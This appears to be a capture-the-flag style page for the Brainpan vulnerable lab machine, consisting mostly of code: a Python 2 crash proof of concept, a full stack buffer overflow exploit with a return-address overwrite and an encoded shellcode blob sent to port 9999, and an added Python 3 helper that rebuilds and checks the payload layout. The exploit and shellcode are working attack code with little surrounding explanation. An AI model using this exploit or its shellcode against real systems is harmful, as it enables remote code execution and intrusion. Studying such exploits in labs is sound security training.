
Brainpan

```python
#!/usr/bin/python
# Python 2 crash PoC: sends a 1000-byte buffer to brainpan.exe to trigger the overflow
import socket, sys

payload = "A" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect(('192.168.228.140', 9999))  # IP of WinXP SP3 machine running brainpan.exe
except:
    print "[-] Connection failed! Noob!"
    sys.exit(0)

s.recv(1024)    # read the password prompt before sending
s.send(payload)
s.close()
```

==========================================

```python
#!/usr/bin/python
# Python 2 exploit: 524 bytes of filler, 4-byte overwrite of the saved return address,
# 12 bytes of padding, then the shellcode
import socket, sys

shellcode = ""
shellcode += "\xda\xc0\xba\x2c\xaf\xfd\xb9\xd9\x74\x24\xf4\x58"
shellcode += "\x33\xc9\xb1\x52\x31\x50\x17\x83\xe8\xfc\x03\x7c"
shellcode += "\xbc\x1f\x4c\x80\x2a\x5d\xaf\x78\xab\x02\x39\x9d"
shellcode += "\x9a\x02\x5d\xd6\x8d\xb2\x15\xba\x21\x38\x7b\x2e"
shellcode += "\xb1\x4c\x54\x41\x72\xfa\x82\x6c\x83\x57\xf6\xef"
shellcode += "\x07\xaa\x2b\xcf\x36\x65\x3e\x0e\x7e\x98\xb3\x42"
shellcode += "\xd7\xd6\x66\x72\x5c\xa2\xba\xf9\x2e\x22\xbb\x1e"
shellcode += "\xe6\x45\xea\xb1\x7c\x1c\x2c\x30\x50\x14\x65\x2a"
shellcode += "\xb5\x11\x3f\xc1\x0d\xed\xbe\x03\x5c\x0e\x6c\x6a"
shellcode += "\x50\xfd\x6c\xab\x57\x1e\x1b\xc5\xab\xa3\x1c\x12"
shellcode += "\xd1\x7f\xa8\x80\x71\x0b\x0a\x6c\x83\xd8\xcd\xe7"
shellcode += "\x8f\x95\x9a\xaf\x93\x28\x4e\xc4\xa8\xa1\x71\x0a"
shellcode += "\x39\xf1\x55\x8e\x61\xa1\xf4\x97\xcf\x04\x08\xc7"
shellcode += "\xaf\xf9\xac\x8c\x42\xed\xdc\xcf\x0a\xc2\xec\xef"
shellcode += "\xca\x4c\x66\x9c\xf8\xd3\xdc\x0a\xb1\x9c\xfa\xcd"
shellcode += "\xb6\xb6\xbb\x41\x49\x39\xbc\x48\x8e\x6d\xec\xe2"
shellcode += "\x27\x0e\x67\xf2\xc8\xdb\x28\xa2\x66\xb4\x88\x12"
shellcode += "\xc7\x64\x61\x78\xc8\x5b\x91\x83\x02\xf4\x38\x7e"
shellcode += "\xc5\x3b\x14\x64\xc2\xd4\x67\x64\xfc\x78\xe1\x82"
shellcode += "\x94\x90\xa7\x1d\x01\x08\xe2\xd5\xb0\xd5\x38\x90"
shellcode += "\xf3\x5e\xcf\x65\xbd\x96\xba\x75\x2a\x57\xf1\x27"
shellcode += "\xfd\x68\x2f\x4f\x61\xfa\xb4\x8f\xec\xe7\x62\xd8"
shellcode += "\xb9\xd6\x7a\x8c\x57\x40\xd5\xb2\xa5\x14\x1e\x76"
shellcode += "\x72\xe5\xa1\x77\xf7\x51\x86\x67\xc1\x5a\x82\xd3"
shellcode += "\x9d\x0c\x5c\x8d\x5b\xe7\x2e\x67\x32\x54\xf9\xef"
shellcode += "\xc3\x96\x3a\x69\xcc\xf2\xcc\x95\x7d\xab\x88\xaa"
shellcode += "\xb2\x3b\x1d\xd3\xae\xdb\xe2\x0e\x6b\xeb\xa8\x12"
shellcode += "\xda\x64\x75\xc7\x5e\xe9\x86\x32\x9c\x14\x05\xb6"
shellcode += "\x5d\xe3\x15\xb3\x58\xaf\x91\x28\x11\xa0\x77\x4e"
shellcode += "\x86\xc1\x5d"

# filler to the saved return address + address bytes (little-endian) + padding + shellcode
payload = "A" * 524 + "\xf3\x12\x17\x31" + "C" * 12 + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect(('192.168.228.141', 9999))  # IP of WinXP SP3 machine running brainpan.exe
except:
    print "[-] Connection failed! Noob!"
    sys.exit(0)

s.recv(1024)    # read the password prompt before sending
s.send(payload)
s.close()
```
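The payload line above packs four regions into one string, and the most common mistake when reproducing it is getting the byte order of the address wrong or miscounting the filler. The following Python 3 example is added here and is not code from the original page: it rebuilds the same layout with struct.pack so the little-endian encoding of the four address bytes is explicit, reports where each region lands, and checks a shellcode blob for bytes that a string copy would truncate on. The offset 524, the address bytes and the 12-byte padding are taken from the script above; the shellcode is a constructed placeholder of NOP bytes, the bad-byte set is a common default rather than one the page states, and all function names are my own.

```python
import struct

# Values taken from the exploit script on this page
OFFSET = 524            # bytes of filler before the saved return address
RET_ADDR = 0x311712f3   # "\xf3\x12\x17\x31" read back as a little-endian dword
PAD_LEN = 12            # "C" * 12 between the address and the shellcode

# Constructed placeholder standing in for real shellcode (NOP bytes only)
PLACEHOLDER_SHELLCODE = b"\x90" * 32


def build_payload(offset=OFFSET, ret_addr=RET_ADDR, pad_len=PAD_LEN,
                  shellcode=PLACEHOLDER_SHELLCODE):
    """Assemble filler + packed return address + padding + shellcode as bytes."""
    return (b"A" * offset
            + struct.pack("<I", ret_addr)   # little-endian, the order x86 reads it
            + b"C" * pad_len
            + shellcode)


def layout(payload, offset=OFFSET, pad_len=PAD_LEN):
    """Return the (start, end) slice of each region so the layout can be verified."""
    ret_start = offset
    ret_end = ret_start + 4
    pad_end = ret_end + pad_len
    return {
        "filler": (0, ret_start),
        "ret_addr": (ret_start, ret_end),
        "padding": (ret_end, pad_end),
        "shellcode": (pad_end, len(payload)),
    }


def decode_ret_addr(payload, offset=OFFSET):
    """Read back the dword at the overwrite position (what EIP would receive)."""
    return struct.unpack("<I", payload[offset:offset + 4])[0]


def contains_bad_bytes(shellcode, bad=(0x00, 0x0a, 0x0d)):
    """List bytes in the blob that a C string copy or line-based reader would stop on.
    The default set (NUL, LF, CR) is an assumption, not something the page states."""
    return sorted({b for b in shellcode if b in bad})


if __name__ == "__main__":
    p = build_payload()
    for name, (start, end) in layout(p).items():
        print("%-9s %4d..%4d  %s" % (name, start, end, p[start:end][:8].hex()))
    print("EIP would receive 0x%08x" % decode_ret_addr(p))
    print("bad bytes in placeholder shellcode:", contains_bad_bytes(PLACEHOLDER_SHELLCODE))
```

Running it prints the four regions with their byte ranges and confirms that the dword at offset 524 decodes to 0x311712f3, which is the check worth doing before sending anything: if the address had been written big-endian, decode_ret_addr would return a different value and the overwrite would land on a meaningless address.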


Last updated 5 years ago
